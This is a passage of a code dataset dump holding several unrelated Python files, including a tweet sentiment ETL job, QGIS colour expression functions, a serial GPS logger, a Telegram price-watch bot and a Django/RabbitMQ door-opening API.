self.service.finish_test_item(item_id=item_id, end_time=timestamp(),\n status=status)\n","sub_path":"dusty/reporters/reportportal/legacy.py","file_name":"legacy.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"389625926","text":"\n\n#calss header\nclass _INCONCEIVABLE():\n\tdef __init__(self,): \n\t\tself.name = \"INCONCEIVABLE\"\n\t\tself.definitions = [u'impossible to imagine or think of: ', u'extremely unlikely: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_inconceivable.py","file_name":"_inconceivable.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"232548896","text":"import pymongo\nimport time\nimport os\nimport re\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nfrom sqlalchemy import create_engine\n\n# Postgres environment variables\nHOST = 'post_db' # postgres container\nUSER = os.getenv('POSTGRES_USER')\nPW = os.getenv('POSTGRES_PASSWORD')\nDB = os.getenv('POSTGRES_DB')\n\n# Lag time for starting up MongoDB-Database\ntime.sleep(10)\n\n# Connect to MongoDB database in the Docker-Container 'mongodb'\nclient = pymongo.MongoClient('mongodb')\n# access the database with in MongoDB\ndb = client.tweets\n\n# Sentiment Analysis\ns = SentimentIntensityAnalyzer()\n# Clean text\ndef clean_text(text):\n return ' '.join(re.sub(\"(@[A-Za-z0-9]+)|(\\w+:\\/\\/\\S+)|(#[A-Za-z0-9]+)|([^A-Za-z0-9 ]|(RT))\",\" \",text).split())\n\n# Connect to Postgres DB \n#pg = create_engine(f'postgres://postgres:3455@post_db:5432/post_etl', echo=True)\npg = create_engine(f'postgres://{USER}:{PW}@{HOST}:5432/{DB}', echo=True)\n\n# Create a Table in the Postgres Database\npg.execute('''\n CREATE TABLE IF NOT EXISTS tweets (\n time_created TIMESTAMP,\n text VARCHAR(500),\n username VARCHAR(30),\n followers INTEGER,\n sentiment NUMERIC\n );\n''')\n\n# Insert data from MongoDB to Postgres DB\n\ntimestamp = None\n\nwhile True:\n # Populate postgres_db every 10s with new values by selecting only entries which hasn't been added to db\n if not timestamp:\n entries = db.tweets.find()\n else:\n entries = db.tweets.find({\"timestamp\" :{\"$gt\" : timestamp}})\n \n for e in entries:\n timestamp = e['timestamp']\n time_created = e['time_created']\n text = e['text']\n username = e['username']\n followers = e['followers_count']\n sentiment = s.polarity_scores(clean_text(e['text']))\n score = sentiment['compound']\n ## Query check for duplicates according to time_created\n query = \"\"\"INSERT INTO tweets(time_created, text, username, followers, sentiment) \n SELECT %s, %s, %s, %s, %s WHERE NOT EXISTS (SELECT * FROM tweets WHERE tweets.time_created = %s)\"\"\"\n pg.execute(query, (time_created, text, username, followers, score, time_created))\n time.sleep(10)","sub_path":"etl_job/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"618326985","text":"\"\"\"\r\nExtra functions for QgsExpression\r\n\r\nregister=False in order to delay registring of functions before we load the plugin\r\n\"\"\"\r\n\r\nfrom qgis.utils import qgsfunction\r\nfrom qgis.core import QgsStyleV2, QgsExpression, QgsSymbolLayerV2Utils\r\nfrom PyQt4.QtCore import QObject, QDateTime, QDate\r\nfrom PyQt4.QtGui import QColor\r\n\r\ndef getFloat(value):\r\n try:\r\n return value, None\r\n except ValueError:\r\n return 0, \"Can not convert {} to float\".format(value)\r\n\r\n@qgsfunction(2, \"Expressions +\", register=False)\r\ndef ramp_color_rgb(values, feature, parent):\r\n \"\"\"\r\n Return only the rgb part of a defined color ramp\r\n \r\n

    Syntax

    \r\n ramp_color_rgb(ramp_name,value)

    \r\n\r\n

    Arguments

    \r\n ramp_name → the name of the color ramp as a string, for example 'Spectral'.
    \r\n value → the position on the ramp to select the color from as a real number between 0 and 1.

    \r\n \r\n

    Example

    \r\n \r\n ramp_color_rgb('Spectral',0.3) → '253,190,115'

    \r\n \r\n

    Note:

    \r\n The color ramps available vary between QGIS installations. This function\r\n may not give the expected results if you move your Quantum project.\r\n

    \r\n \"\"\" \r\n ramp_name = values[0]\r\n ramp_position = values[1]\r\n \r\n ramp = QgsStyleV2.defaultStyle().colorRampRef(ramp_name)\r\n if not ramp:\r\n parent.setEvalErrorString( QObject.tr( '\"{}\" is not a valid color ramp'.format(ramp_name)))\r\n return QColor(0,0,0).name()\r\n \r\n value, error = getFloat(ramp_position)\r\n if error:\r\n parent.setEvalErrorString(error)\r\n \r\n color = ramp.color(value)\r\n return \"{},{},{}\".format(color.red(), color.green(), color.blue())\r\n\r\n@qgsfunction(1, \"Expressions +\", register=False)\r\ndef red(values, feature, parent):\r\n \"\"\"\r\n Returns the red component of a color\r\n \r\n

    Syntax

    \r\n red(color)

    \r\n\r\n

    Arguments

    \r\n color → a color

    \r\n \r\n

    Example

    \r\n \r\n red('255,0,0') → 255

    \r\n \"\"\" \r\n try:\r\n return QgsSymbolLayerV2Utils.decodeColor(values[0]).red()\r\n except:\r\n return None\r\n \r\n@qgsfunction(1, \"Expressions +\", register=False)\r\ndef green(values, feature, parent):\r\n \"\"\"\r\n Returns the green component of a color\r\n \r\n

    Syntax

    \r\n green(color)

    \r\n\r\n

    Arguments

    \r\n color → a color

    \r\n \r\n

    Example

    \r\n \r\n green('0,255,0') → 255

    \r\n \"\"\" \r\n try:\r\n return QgsSymbolLayerV2Utils.decodeColor(values[0]).green()\r\n except:\r\n return None \r\n\r\n@qgsfunction(1, \"Expressions +\", register=False)\r\ndef blue(values, feature, parent):\r\n \"\"\"\r\n Returns the blue component of a color\r\n \r\n

    Syntax

    \r\n blue(color)

    \r\n\r\n

    Arguments

    \r\n color → a color

    \r\n \r\n

    Example

    \r\n \r\n blue('0,0,255') → 255

    \r\n \"\"\" \r\n try:\r\n return QgsSymbolLayerV2Utils.decodeColor(values[0]).blue()\r\n except:\r\n return None\r\n \r\n@qgsfunction(1, \"Expressions +\", register=False)\r\ndef alpha(values, feature, parent):\r\n \"\"\"\r\n Returns the alpha component of a color\r\n \r\n

    Syntax

    \r\n alpha(color)

    \r\n\r\n

    Arguments

    \r\n color → a color

    \r\n \r\n

    Example

    \r\n \r\n alpha('255,255,255,125') → 125

    \r\n \"\"\" \r\n try:\r\n return QgsSymbolLayerV2Utils.decodeColor(values[0]).alpha()\r\n except:\r\n return None\r\n \r\n@qgsfunction(1, \"Expressions +\", register=False)\r\ndef hue(values, feature, parent):\r\n \"\"\"\r\n Returns the hue component of a color, an integer between 0-360\r\n \r\n

    Syntax

    \r\n hue(color)

    \r\n\r\n

    Arguments

    \r\n color → a color

    \r\n \r\n

    Example

    \r\n \r\n hue('255,0,0') → 0

    \r\n \"\"\" \r\n try:\r\n # Hue ranges from 0 - 360\r\n return int(QgsSymbolLayerV2Utils.decodeColor(values[0]).hueF() * 360)\r\n except:\r\n return None \r\n\r\n@qgsfunction(1, \"Expressions +\", register=False)\r\ndef saturation(values, feature, parent):\r\n \"\"\"\r\n Returns the saturation of a color, an integer between 0-100\r\n \r\n

    Syntax

    \r\n saturation(color)

    \r\n\r\n

    Arguments

    \r\n color → a color

    \r\n \r\n

    Example

    \r\n \r\n saturation('125,255,125') → 50

    \r\n \"\"\" \r\n try:\r\n # Saturation ranges from 0 - 100\r\n return int(QgsSymbolLayerV2Utils.decodeColor(values[0]).saturationF() * 100)\r\n except:\r\n return None\r\n\r\n@qgsfunction(1, \"Expressions +\", register=False)\r\ndef lightness(values, feature, parent):\r\n \"\"\"\r\n Returns the lightness of a color, an integer between 0-100\r\n \r\n

    Syntax

    \r\n lightness(color)

    \r\n\r\n

    Arguments

    \r\n color → a color

    \r\n \r\n

    Example

    \r\n \r\n lightness('125,255,125') → 74

    \r\n \"\"\" \r\n try:\r\n # Lightness ranges from 0 - 100\r\n return int(QgsSymbolLayerV2Utils.decodeColor(values[0]).lightnessF() * 100)\r\n except:\r\n return None\r\n\r\n@qgsfunction(1, \"Expressions +\", register=False)\r\ndef hsv_value(values, feature, parent):\r\n \"\"\"\r\n Returns the hsv value component of a color, an integer between 0-100\r\n \r\n

    Syntax

    \r\n hsv_value(color)

    \r\n\r\n

    Arguments

    \r\n color → a color

    \r\n \r\n

    Example

    \r\n \r\n hsv_value('125,255,125') → 100

    \r\n \"\"\" \r\n try:\r\n # Value ranges from 0 - 100\r\n return int(QgsSymbolLayerV2Utils.decodeColor(values[0]).valueF() * 100)\r\n except:\r\n return None\r\n \r\n@qgsfunction(2, \"Expressions +\", register=False)\r\ndef set_red(values, feature, parent):\r\n \"\"\"\r\n Sets the red component of a color\r\n \r\n

    Syntax

    \r\n set_red(color, red)

    \r\n\r\n

    Arguments

    \r\n color → a color
    \r\n red → a integer between 0 and 255

    \r\n \r\n

    Example

    \r\n \r\n set_red('255,255,255', 125) → '125,255,255'

    \r\n \"\"\" \r\n try:\r\n color = QgsSymbolLayerV2Utils.decodeColor(values[0])\r\n color.setRed(values[1])\r\n return QgsSymbolLayerV2Utils.encodeColor(color)\r\n except: \r\n return None\r\n\r\n@qgsfunction(2, \"Expressions +\", register=False)\r\ndef set_green(values, feature, parent):\r\n \"\"\"\r\n Sets the blue component of a color\r\n \r\n

    Syntax

    \r\n set_green(color, blue)

    \r\n\r\n

    Arguments

    \r\n color → a color
    \r\n green → a integer between 0 and 255

    \r\n \r\n

    Example

    \r\n \r\n set_green('255,255,255', 125) → '255,125,255'

    \r\n \"\"\" \r\n try:\r\n color = QgsSymbolLayerV2Utils.decodeColor(values[0])\r\n color.setGreen(values[1])\r\n return QgsSymbolLayerV2Utils.encodeColor(color)\r\n except: \r\n return None \r\n \r\n@qgsfunction(2, \"Expressions +\", register=False)\r\ndef set_blue(values, feature, parent):\r\n \"\"\"\r\n Sets the blue component of a color\r\n \r\n

    Syntax

    \r\n set_blue(color, blue)

    \r\n\r\n

    Arguments

    \r\n color → a color
    \r\n blue → a integer between 0 and 255

    \r\n \r\n

    Example

    \r\n \r\n set_blue('255,255,255', 125) → '255,255,125'

    \r\n \"\"\" \r\n try:\r\n color = QgsSymbolLayerV2Utils.decodeColor(values[0])\r\n color.setBlue(values[1])\r\n return QgsSymbolLayerV2Utils.encodeColor(color)\r\n except: \r\n return None\r\n \r\n@qgsfunction(2, \"Expressions +\", register=False)\r\ndef set_hue(values, feature, parent):\r\n \"\"\"\r\n Sets the hue component of a color\r\n \r\n

    Syntax

    \r\n set_hue(color, hue)

    \r\n\r\n

    Arguments

    \r\n color → a color
    \r\n hue → a integer between 0 and 360

    \r\n \r\n

    Example

    \r\n \r\n set_hue('0,255,0,255', 0) → '255,0,0,255'

    \r\n \"\"\" \r\n try:\r\n color = QgsSymbolLayerV2Utils.decodeColor(values[0])\r\n color.setHslF(values[1] / 360.0, color.saturationF(), color.lightnessF(), color.alphaF())\r\n return QgsSymbolLayerV2Utils.encodeColor(color)\r\n except: \r\n return None\r\n \r\n@qgsfunction(2, \"Expressions +\", register=False)\r\ndef set_saturation(values, feature, parent):\r\n \"\"\"\r\n Sets the saturation of a color\r\n \r\n

    Syntax

    \r\n set_saturation(color, saturation)

    \r\n\r\n

    Arguments

    \r\n color → a color
    \r\n saturation → a integer between 0 and 100

    \r\n \r\n

    Example

    \r\n \r\n set_saturation('0,255,0,255', 0) → '128,128,128,125'

    \r\n \"\"\" \r\n try:\r\n color = QgsSymbolLayerV2Utils.decodeColor(values[0])\r\n color.setHslF(color.hueF(), values[1] / 100.0, color.lightnessF(), color.alphaF())\r\n return QgsSymbolLayerV2Utils.encodeColor(color)\r\n except: \r\n return None\r\n \r\n@qgsfunction(2, \"Expressions +\", register=False)\r\ndef set_lightness(values, feature, parent):\r\n \"\"\"\r\n Sets the lightness of a color\r\n \r\n

    Syntax

    \r\n set_lightness(color, lightness)

    \r\n\r\n

    Arguments

    \r\n color → a color
    \r\n lightness → a integer between 0 and 100

    \r\n \r\n

    Example

    \r\n \r\n set_lightness('0,255,0,255', 10) → '0,51,0,255'

    \r\n \"\"\" \r\n try:\r\n color = QgsSymbolLayerV2Utils.decodeColor(values[0])\r\n color.setHslF(color.hueF(), color.saturationF(), values[1] / 100.0, color.alphaF())\r\n return QgsSymbolLayerV2Utils.encodeColor(color)\r\n except: \r\n return None\r\n\r\n@qgsfunction(2, \"Expressions +\", register=False)\r\ndef set_hsv_value(values, feature, parent):\r\n \"\"\"\r\n Sets the value of a color\r\n \r\n

    Syntax

    \r\n set_hsv_value(color, value)

    \r\n\r\n

    Arguments

    \r\n color → a color
    \r\n value → a integer between 0 and 100

    \r\n \r\n

    Example

    \r\n \r\n set_hsv_value('0,255,0,255', 50) → '0,128,0,255'

    \r\n \"\"\" \r\n try:\r\n color = QgsSymbolLayerV2Utils.decodeColor(values[0])\r\n color.setHsvF(color.hueF(), color.saturationF(), values[1] / 100.0, color.alphaF())\r\n return QgsSymbolLayerV2Utils.encodeColor(color)\r\n except: \r\n return None \r\n\r\n@qgsfunction(2, \"Expressions +\", register=False)\r\ndef set_alpha(values, feature, parent):\r\n \"\"\"\r\n Sets the alpha component of a color\r\n \r\n

    Syntax

    \r\n set_alpha(color, alpha)

    \r\n\r\n

    Arguments

    \r\n color → a color
    \r\n alpha → an alpha value between 0 and 255

    \r\n \r\n

    Example

    \r\n \r\n set_alpha('255,255,255,255', 125) → '255,255,255,125'

    \r\n \"\"\" \r\n try:\r\n color = QgsSymbolLayerV2Utils.decodeColor(values[0])\r\n color.setAlpha(values[1])\r\n return QgsSymbolLayerV2Utils.encodeColor(color)\r\n except: \r\n return None \r\n \r\n@qgsfunction(1, \"Expressions +\", register=False)\r\ndef dow(values, feature, parent):\r\n \"\"\"\r\n Returns an integer representing the day of week for a given date. Returned \r\n values range from 0-6, where 0 is Sunday.\r\n \r\n

    Syntax

    \r\n dow(date)

    \r\n\r\n

    Arguments

    \r\n date → a date value. Must be a valid date or datetime field, or a \r\n string in the format 'yyyy-mm-dd'.

    \r\n \r\n

    Example

    \r\n \r\n dow('2013-07-01') → 1

    \r\n \"\"\" \r\n input_date = values[0]\r\n \r\n # Return dayOfWeek() % 7 so that values range from 0 (sun) to 6 (sat)\r\n # to match Postgresql behaviour\r\n if type(input_date) == QDateTime:\r\n return input_date.date().dayOfWeek() % 7\r\n elif type(input_date) == QDate:\r\n return input_date.dayOfWeek() % 7\r\n elif type(input_date) in (str, unicode): \r\n # Convert string to qdate\r\n input_qdate = QDate.fromString(input_date, 'yyyy-MM-dd')\r\n if input_qdate.isValid():\r\n return input_qdate.dayOfWeek() % 7 \r\n else:\r\n return None\r\n \r\nfunctions = [ramp_color_rgb, red, green, blue, hue, saturation, lightness, hsv_value, alpha,\r\n set_alpha, set_red, set_hue, set_saturation, set_lightness, set_hsv_value, dow]\r\n \r\ndef registerFunctions():\r\n for func in functions:\r\n if QgsExpression.registerFunction(func):\r\n yield func.name()\r\n \r\ndef unregisterFunctions(): \r\n # Unload all the functions that we created. \r\n for func in functions:\r\n QgsExpression.unregisterFunction(func.name())\r\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":14494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"340842908","text":"#!/usr/bin/python3\n# GPS logger example\n# For use with PiCAN-GPS board\n# http://skpang.co.uk/catalog/pican-with-gps-canbus-board-for-raspberry-pi-23-p-1520.html\n# \n# Serial and GPS routine writern by David Whale\n#\n# SK Pang 15th March 2017\n#\n#\n\nimport math\nimport time\nimport serial\n\nPORT = \"/dev/ttyS0\"\nBAUD = 9600\n\ns = serial.Serial(PORT)\ns.baudrate = BAUD\ns.parity = serial.PARITY_NONE\ns.databits = serial.EIGHTBITS\ns.stopbits = serial.STOPBITS_ONE\ns.timeout = 0 # non blocking mode\n\ns.close()\ns.port = PORT\ns.open()\noutfile = open('log.txt','w')\n\n#----- SERIAL PORT READ AND WRITE ENGINE --------------------------------------\nline_buffer = \"\"\nrec_buffer = None\n\ndef read_waiting():\n \"\"\"Poll the serial and fill up rec_buffer if something comes in\"\"\"\n global rec_buffer\n if rec_buffer != None:\n return True\n\n line = process_serial()\n if line != None:\n rec_buffer = line\n return True\n\n return False\n\ndef read():\n \"\"\"Poll the rec_buffer and remove next line from it if there is a line in it\"\"\"\n global rec_buffer\n\n if not read_waiting():\n return None\n\n rec = rec_buffer\n rec_buffer = None\n ##print(\"read:\" + rec)\n return rec\n\ndef process_serial():\n \"\"\"Low level serial poll function\"\"\"\n global line_buffer\n\n while True:\n data = s.read(1)\n data = data.decode('utf-8')\n #print(data, type(data), len(data))\n \n if len(data) == 0:\n #print(\"RETURN NONE\")\n return None # no new data has been received\n data = data[0]\n\n if data == '\\r':\n #print(\"RETURN \")\n pass # strip newline\n\n elif data == '\\n':\n #print(\"NEWLINE \")\n line = line_buffer\n line_buffer = \"\"\n #print(line)\n return line\n\n else:\n #print(\"ADD %s\" % data)\n line_buffer += data\n\n#----- ADAPTOR ----------------------------------------------------------------\n\n# This is here, so you can change the concurrency and blocking model,\n# independently of the underlying code, to adapt to how your app wants\n# to interact with the serial port.\n\n# NOTE: This is configured for non blocking send and receive, but no threading\n# and no callback handling.\n\ndef send_message(msg):\n \"\"\"Send a message to the micro:bit.\n It is the callers responsibility to add newlines if you want them.\n \"\"\"\n ##print(\"Sending:%s\" % msg)\n\n s.write(msg)\n\ndef get_next_message():\n \"\"\"Receive a single line of text from the micro:bit.\n Newline characters are pre-stripped from the end.\n If there is not a complete line waiting, returns None.\n Call this regularly to 'pump' the receive engine.\n \"\"\"\n result = read()\n ##if result != None:\n ## print(\"get_next_message:%s\" % str(result))\n return result\n\ndef print_csv(values):\n line = \"\"\n for v in values:\n if line != \"\":\n line += ','\n line += str(v)\n print(line,file = outfile) # Save data to file\n #log_file.write(line + '\\n')\n #log_file.flush()\n print(line)\n\nREPORT_RATE = 1.0\ndate = \"\"\n\nnext_report = time.time() + REPORT_RATE\n\nlocked = False\ndate,timestamp, northing, northing_flag, easting, easting_flag = \"\",\"\",\"\",\"\",\"\",\"\"\n\ntry:\n while True:\n now = time.time()\n\n if now > next_report:\n next_report = now + REPORT_RATE\n values = date,timestamp,locked,northing, northing_flag, easting, easting_flag\n print_csv(values)\n\n gps_data = get_next_message()\n if gps_data is not None:\n parts = gps_data.split(',')\n rec_type = parts[0]\n if rec_type == \"$GPRMC\":\n date = parts[9]\n #print(date)\n if rec_type == \"$GPGSA\":\n lock_flag = parts[1]\n if lock_flag == 'A':\n #print(\"GPS LOCKED\")\n locked = True\n else:\n #print(\"NO GPS LOCK:%s\" % lock_flag)\n locked = False\n\n elif rec_type == \"$GPGGA\":\n if locked:\n timestamp, northing, northing_flag, easting, easting_flag = parts[1:6]\n else:\n timestamp, northing, northing_flag, easting, easting_flag = \"\",\"\",\"\",\"\",\"\"\n\nexcept KeyboardInterrupt:\n #Catch keyboard interrupt\n outfile.close()\n #os.system(\"sudo /sbin/ip link set can0 down\")\n print('\\n\\rKeyboard interrtupt')\n \n\n\n","sub_path":"gps_logger.py","file_name":"gps_logger.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"646949085","text":"from setuptools.command.install import install as install_\n\nfrom babel.messages.frontend import compile_catalog\nimport pkg_resources\n\nfrom setuptools import setup\n\n\nclass compile_all_catalogs(compile_catalog):\n \"\"\"Inspired by http://pfacka.binaryparadise.com/articles/localization-of-webapplications-with-babel.html\n \"\"\"\n\n def initialize_options(self):\n compile_catalog.initialize_options(self)\n self.directory = pkg_resources.resource_filename('svs', 'data/i18n/locales')\n\n def finalize_options(self):\n compile_catalog.finalize_options(self)\n self.ensure_dirname('directory')\n\n def get_outputs(self):\n # necessary to be able to use 'pip install'\n return []\n\n\nclass install(install_):\n sub_commands = install_.sub_commands + [('compile_all_catalogs', None)]\n\n\nsetup(name='svs',\n version='0.3.1',\n description='The InAcademia Simple validation Service allows for the easy validation of affiliation (Student,'\n 'Faculty, Staff) of a user in Academia',\n license='Apache 2.0',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python :: 2.7',\n ],\n author='DIRG',\n author_email='tech@inacademia.org',\n zip_safe=False,\n url='http://www.inacademia.org',\n packages=['svs'],\n package_data={\n 'svs': [\n 'data/i18n/locales/*/LC_MESSAGES/*.po',\n 'templates/*.mako',\n 'site/static/*',\n ],\n },\n package_dir={'': 'src'},\n entry_points={\n 'console_scripts': ['inacademia=svs.inacademia_server:main'],\n },\n message_extractors={\n 'src': [\n ('**.py', 'python', None),\n ('**/templates/**.mako', 'mako', None)\n ]\n },\n cmdclass={\n 'install': install,\n 'compile_all_catalogs': compile_all_catalogs\n },\n install_requires=[\n 'Babel',\n 'pyjwkest',\n 'oic>=0.7.8',\n 'pysaml2',\n 'cherrypy'\n ],\n tests_require=['pytest', 'mock'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"513122524","text":"# Imports\n\nimport os\nimport requests\n# Webscraper\nfrom bs4 import BeautifulSoup\n# Time - functions\nfrom datetime import datetime\nfrom threading import Timer\n# Bot token and id\nfrom dotenv import load_dotenv\nload_dotenv()\n\n# Establish time \nx = datetime.today()\ny = x.replace(day = x.day+1, hour = 9, minute = 0, second = 0)\ndelta_t = y-x\nsecs = delta_t.seconds+1\n\ntoken = os.getenv('TOKEN')\nchat_id = os.getenv('CHAT_ID')\n# Product page\nurl = 'https://www.thomann.de/fi/tc_electronic_hall_of_fame_2.htm'\ntelegram_api_send_message = f'https://api.telegram.org/bot{token}/sendMessage'\n# Set the target price\nmy_price = 100\n\ndef main():\n source = requests.get(url)\n soup = BeautifulSoup(source.text, 'html.parser')\n # Pull the name and price of the product from the site\n title = soup.find(itemprop=\"name\").get_text().strip()\n price = soup.find(class_ = \"prod-pricebox-price\").get_text().strip()[0:3] # format the \n \n # Define the content of the Telegram - message\n data = {\n 'chat_id': chat_id,\n 'text': f'*${price}*\\n[{title}]({url})',\n 'parse_mode': 'Markdown'\n }\n\n # compare the list-price to the target\n if price > str(my_price):\n print(\"The price is still too high\")\n else:\n source = requests.post(telegram_api_send_message, data=data)\n\n# Run the program once every day at desired time\nt = Timer(secs, main)\n\n# Start the timer, which runs the main - method\nif __name__ == '__main__':\n t.start()","sub_path":"hof_watcher.py","file_name":"hof_watcher.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"605312806","text":"from django.http import Http404\r\nfrom django.shortcuts import render\r\nfrom .models import Door\r\nfrom rest_framework import mixins\r\nfrom rest_framework import generics\r\nfrom rest_framework.views import APIView\r\nfrom rest_framework.response import Response\r\nfrom .serializers import DoorSerializer\r\nimport json\r\nimport pika\r\nimport os\r\nfrom dotenv import load_dotenv\r\nfrom datetime import datetime\r\n\r\n# Environment Variables \r\nload_dotenv()\r\n\r\nRMQ_USER = os.getenv('RMQ_USER')\r\nPASS = os.getenv('RMQ_PASS')\r\nIP = os.getenv('RMQ_IP')\r\nPORT = os.getenv('RMQ_PORT')\r\nCREDENTIALS = pika.PlainCredentials(RMQ_USER, PASS)\r\n\r\nclass DoorList(mixins.ListModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):\r\n queryset = Door.objects.all()\r\n serializer_class = DoorSerializer\r\n\r\n \"\"\"\r\n Returns a list of all doors\r\n \"\"\"\r\n def get(self, request, *args, **kwargs):\r\n return self.list(request, *args, **kwargs)\r\n\r\n\r\nclass DoorOpen(APIView):\r\n connection = pika.BlockingConnection(pika.ConnectionParameters(IP, PORT, '/', CREDENTIALS))\r\n channel = connection.channel()\r\n channel.confirm_delivery()\r\n\r\n \"\"\"\r\n Adds a message to the target door's message queue\r\n \"\"\"\r\n def load_queue(self, door):\r\n \r\n try:\r\n if not self.connection or self.connection.is_closed:\r\n print(\"Connection with RabbitMQ has ended... reconnected\")\r\n self.connection = pika.BlockingConnection(pika.ConnectionParameters(IP, PORT, '/', CREDENTIALS))\r\n self.channel = self.connection.channel()\r\n\r\n now = datetime.now()\r\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\r\n message = \"OPEN DOOR Message sent: {}\".format(dt_string)\r\n\r\n self.channel.basic_publish(exchange='',\r\n routing_key=door.door_name,\r\n body=message, mandatory=True)\r\n\r\n return {\r\n 'success': 'Added a message request to ' + door.door_name + ' ' + message\r\n }\r\n except Exception as e:\r\n return {\r\n \"error\": str(e)\r\n }\r\n\r\n \"\"\"\r\n Get an instance of the Door from the database\r\n \"\"\"\r\n def get_door(self, pk):\r\n try:\r\n return Door.objects.get(pk=pk)\r\n except Door.DoesNotExist:\r\n raise Http404\r\n\r\n \"\"\"\r\n Uses the JSON data to send a message to a door's message queue\r\n \"\"\"\r\n def post(self, request, pk, format=None):\r\n door = self.get_door(pk)\r\n response = self.load_queue(door)\r\n return Response(response)\r\n","sub_path":"src/door/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"412816132","text":"import threading\nimport time\nfrom os.path import join\nfrom datetime import datetime\nimport numpy as np\n\nimport os\nimport sys\n\nsys.path.append('../../')\nfrom core4.AspectLearnerGSOM import AspectLearnerGSOM\nfrom core4.AssociativeGSOM import AssociativeGSOM\n\nfrom params import params as Params\nimport Lock\n\n\ndef generate_output_config(SF, forget_threshold):\n # File Config\n dataset = 'Classifier'\n experiment_id = 'Exp-' + datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d-%H-%M-%S')\n output_save_location = join('output/', experiment_id)\n\n # Output data config\n output_save_filename = '{}_data_'.format(dataset)\n filename = output_save_filename + str(SF) + '_T_' + str(temporal_contexts) + '_mage_' + str(\n forget_threshold) + 'itr'\n plot_output_name = join(output_save_location, filename)\n\n # Generate output plot location\n output_loc = plot_output_name\n output_loc_images = join(output_loc, 'images/')\n if not os.path.exists(output_loc):\n os.makedirs(output_loc)\n if not os.path.exists(output_loc_images):\n os.makedirs(output_loc_images)\n\n return output_loc, output_loc_images\n\n\nif __name__ == \"__main__\":\n SF = 0.83\n forget_threshold = 60\n temporal_contexts = 1\n learning_itr = 100\n smoothing_irt = 50\n plot_for_itr = 4\n\n # Init GSOM Parameters\n gsom_params = Params.GSOMParameters(SF, learning_itr, smoothing_irt,\n distance=Params.DistanceFunction.EUCLIDEAN,\n temporal_context_count=temporal_contexts,\n forget_itr_count=forget_threshold)\n generalise_params = Params.GeneraliseParameters(gsom_params)\n\n # Setup the age threshold based on the input vector length\n generalise_params.setup_age_threshold(Lock.INPUT_SIZE)\n\n # Process the input files\n output_loc, output_loc_images = generate_output_config(SF, forget_threshold)\n\n X_train_emotion = Lock.emotion_feature\n X_train_behaviour = Lock.behaviour_feature\n y_train_emotion = Lock.emotion_label\n y_train_behaviour = Lock.behaviour_label\n\n result_dict = []\n start_time = time.time()\n\n EmotionGSOM = AspectLearnerGSOM(generalise_params.get_gsom_parameters(), \"emotion\", X_train_emotion,\n X_train_emotion.shape[1],\n plot_for_itr=plot_for_itr,\n activity_classes=y_train_emotion, output_loc=output_loc_images)\n\n BehaviourGSOM = AspectLearnerGSOM(generalise_params.get_gsom_parameters(), \"behaviour\", X_train_behaviour,\n X_train_behaviour.shape[1],\n plot_for_itr=plot_for_itr,\n activity_classes=y_train_behaviour, output_loc=output_loc_images)\n\n ThreatGSOM = AssociativeGSOM(generalise_params.get_gsom_parameters(),\n X_train_emotion.shape[1] + X_train_behaviour.shape[1],\n plot_for_itr=plot_for_itr,\n activity_classes=y_train_behaviour, output_loc=output_loc_images)\n\n EmotionGSOM.start()\n BehaviourGSOM.start()\n ThreatGSOM.start()\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553650925","text":"# David Powis-Dow CS 101:Python \r\n# 2016-10-31 v0.1\r\n# Chapter 3 : Exercise 6 - Turtle regular polygons \r\n\r\nimport turtle\r\nwn = turtle.Screen()\r\nwn.bgcolor(\"lightgreen\") \r\nalex = turtle.Turtle()\r\nalex.shape(\"turtle\")\r\nalex.color(\"blue\")\r\nsize = 20\r\n\r\nfor t in range(3): \r\n alex.forward(50)\r\n alex.left(120)\r\n\r\nwn = mainloop()\r\n\r\n\r\n","sub_path":"CS101-Ch3-Ex6.py","file_name":"CS101-Ch3-Ex6.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"144743459","text":"import pandas as pd\nfrom sqlalchemy import create_engine\ntry:\n from middleware import list_mechanisms \nexcept ModuleNotFoundError:\n import list_mechanisms \nfrom datetime import datetime, timedelta\nfrom rich import print\nfrom openpyxl import Workbook\nimport smtplib\nimport csv\nfrom tabulate import tabulate\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport pickle\nimport time\n\nimport os\nimport sys\nimport inspect\ncurrent_dir = os.path.dirname(os.path.abspath(\n inspect.getfile(inspect.currentframe())))\nparent_dir = 